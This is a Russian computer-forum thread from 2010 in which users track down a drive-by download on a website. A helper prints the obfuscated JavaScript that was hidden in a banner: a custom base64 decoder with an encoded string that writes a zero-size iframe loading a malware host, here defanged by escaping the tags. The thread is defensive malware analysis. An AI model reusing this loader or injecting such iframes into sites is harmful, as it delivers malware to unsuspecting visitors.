Имя пользователя:
Пароль:  
Помощь | Регистрация | Забыли пароль?  | Правила  

Компьютерный форум OSzone.net » Информационная безопасность » Лечение систем от вредоносных программ » помогите отыскать вирус

Ответить
Настройки темы
помогите отыскать вирус

Аватара для AACC

Пользователь


Сообщения: 146
Благодарности: 2

Профиль | Отправить PM | Цитировать


Изменения
Автор: Sham
Дата: 22-02-2010
Описание: ссылки...
При заходе на сайт ripbox_ru (вернее при первом заходе) если сменить IP то выскочит снова

выскакивает в менеджере загрузок файл и просится счкачать - _http://herewereytinj.com/tera/sv777/pdf.php после скачивания получается файл типа s85LQp3BqohkWX8OXrI2d.pdf (каждый раз другой выходит)

как я понял это разновидность pdf.php вируса

я сообщил админу того сайта... он проверил все шаблоны но вируса не обнаружил
проверка тут http://sitedrill.ru/ripbox.ru показывает что сайт чистый
но всё таки после каждого смена айпи адреса вылазит этот файл на закачку

куда могли спрятать вирус? как определить?

Отправлено: 17:03, 21-02-2010

 

Аватара для AACC

Пользователь


Сообщения: 146
Благодарности: 2

Профиль | Отправить PM | Цитировать


Sham, можешь сделать скриншот в каком месте ты его видел?

Отправлено: 02:04, 23-02-2010 | #11



Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети.

Если же вы забыли свой пароль на форуме, то воспользуйтесь данной ссылкой для восстановления пароля.


Deadooshka


Сообщения: 2562
Благодарности: 697

Профиль | Отправить PM | Цитировать


Цитата AACC:
в каком месте ты его видел? »
внутри <div class="banner"></div>

Я так думаю, что движок того сайта занулен, и скачан незнамо откуда, со скриптами, уже содержащими левый код. Рынок таких загрузок (вирусов и зловредов) существует, и тот кто убирает защиту у платных CMS/форумов, таким образом может захотеть подзаработать...
Это сообщение посчитали полезным следующие участники:

Отправлено: 07:16, 23-02-2010 | #12


Аватара для AACC

Пользователь


Сообщения: 146
Благодарности: 2

Профиль | Отправить PM | Цитировать


Вложения
Тип файла: rar virus menu.rar
(1.6 Kb, 1 просмотров)

вот оказывается в каком файле был спрятан вредоносный код

пароль на архив - virus

я сканировал его разными утилитами... только Kaspersky Virus Removal Tool нашел в нем злой код

п.с.
кто занет как можно расшифровать код в том JS файле

Отправлено: 14:50, 23-02-2010 | #13


Deadooshka


Сообщения: 2562
Благодарности: 697

Профиль | Отправить PM | Цитировать


запустите код в HTML-файле - увидите код iframe (код обезопасен заменой тегов)

HTML код: Выделить весь код
<script language="javascript" type="text/javascript"> function c7a2e3dfd1(y5){var nc='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var ne='';var qb,re,y3,xa,v0,n9,v7;var yf=0;do{xa=nc.indexOf(y5.charAt(yf++));v0=nc.indexOf(y5.charAt(yf++));n9=nc.indexOf(y5.charAt(yf++));v7=nc.indexOf(y5.charAt(yf++));qb=(xa<<2)|(v0>>4);re=((v0&15)<<4)|(n9>>2);y3=((n9&3)<<6)|v7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;ne+=String.fromCharCode(qb);if(n9!=64){if(re>=192)re+=848;else if(re==168)re=1025;else if(re==184)re=1105;ne+=String.fromCharCode(re);}if(v7!=64){if(y3>=192)y3+=848;else if(y3==168)y3=1025;else if(y3==184)y3=1105;ne+=String.fromCharCode(y3);}}while(yf<y5.length);document.write(ne.replace(/\</g,'&lt;').replace(/\>/g,'&gt;'));};c7a2e3dfd1('PGlmcmFtZSBzcmM9Imh0dHA6Ly9oZXJld2VyZXl0aW5qLmNvbS90ZXJhL3N2Nzc3L2luZGV4LnBocCIgd2lkdGg9MCBoZWlnaHQ9MD48L2lmcmFtZT4A'); </script>

тут мы видим функцию c7a2e3dfd1() раскодировки, и закодированную строку 'PGlmcmFtZ....', которая после раскодировки будет тегами, вставляемыми с помощью document.write

Отправлено: 11:17, 24-02-2010 | #14



Компьютерный форум OSzone.net » Информационная безопасность » Лечение систем от вредоносных программ » помогите отыскать вирус

Участник сейчас на форуме Участник сейчас на форуме Участник вне форума Участник вне форума Автор темы Автор темы Шапка темы Сообщение прикреплено

Похожие темы
Название темы Автор Информация о форуме Ответов Последнее сообщение
Помогите отыскать зловред Zusul777 Лечение систем от вредоносных программ 3 03-02-2010 22:15
Flash - На Flashке вирус....ПОМОГИТЕ!!! foxika Лечение систем от вредоносных программ 1 12-07-2009 23:32
Антивирусы - Помогите обнаружить вирус Лина Лечение систем от вредоносных программ 4 20-03-2008 22:47




 
Переход